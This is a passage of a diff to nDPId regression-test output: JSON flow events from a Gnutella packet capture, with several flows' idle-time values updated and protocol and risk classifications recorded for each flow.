00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":131671,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":131671,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83520,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83520,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490660,"flow_last_seen":490660,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":28681,"dst_port":9010,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3968,31 +3968,31 @@ 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":12513,"flow_last_seen":14765,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490658,"flow_last_seen":548572,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490658,"flow_last_seen":548572,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":487301,"flow_last_seen":490657,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00567{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":487301,"flow_last_seen":490657,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00783{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":431178,"flow_last_seen":599325,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":402,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":595449,"flow_last_seen":598465,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551892,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 